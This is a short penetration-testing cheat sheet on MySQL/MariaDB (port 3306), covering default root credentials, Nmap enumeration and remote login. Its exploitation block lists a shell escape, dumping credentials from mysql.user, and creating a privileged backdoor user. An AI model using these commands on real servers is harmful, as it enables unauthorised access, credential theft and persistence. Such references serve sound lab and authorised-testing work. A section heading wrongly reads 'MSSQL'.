# Port 3306 - MySQL/MariaDB

MySQL is commonly found running on either windows or linux servers. The original MySQL solution was bought by Oracle, the previous open-source variant was forked and is referred to as MariaDB.

Default credentials are often set to `root:`, within some instances as per the example not requiring a password.

## MySQL/MariaDB Scanning and Enumeration

| Tool | Script/Module | Auth | MITRE ATT\&CK Tactic | Command                               |
| ---- | ------------- | ---- | -------------------- | ------------------------------------- |
| MSF  | mysql\_enum   | Y    | Reconnaissance       |                                       |
| Nmap | mysql-info    | N    | Reconnaissance       | `sudo nmap -A -p 3306 -n 10.10.10.10` |

## MySQL/MariaDB Exploitation

## MSSQL Database Interaction

The MySQL command line tool can be used to interface with a remote MySQL/MariaDB instance.

{% code overflow="wrap" %}

```bash
# Accessing a Remote Server
mysql -h 10.10.10.10 -u root
mysql -h 10.10.10.10 -u root -e 'show databases;'

# Database Interaction
show databases; # Shows all available databases
use %DATABASE%; # Enter a select database
show tables; # Show tables under a select database
describe %TABLE%; # Show details of a select table
select * from %TABLE% # Show all stored data under a select table

# Exploitation
\! sh # Drop into a shell
mysql -h 10.10.10.10 -u root --password=%PASSWORD% -e "SELECT * FROM mysql.user;" # Credential Dumping
create user test identified by 'test'; # Create a new user and assign admin privileges
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
```

{% endcode %}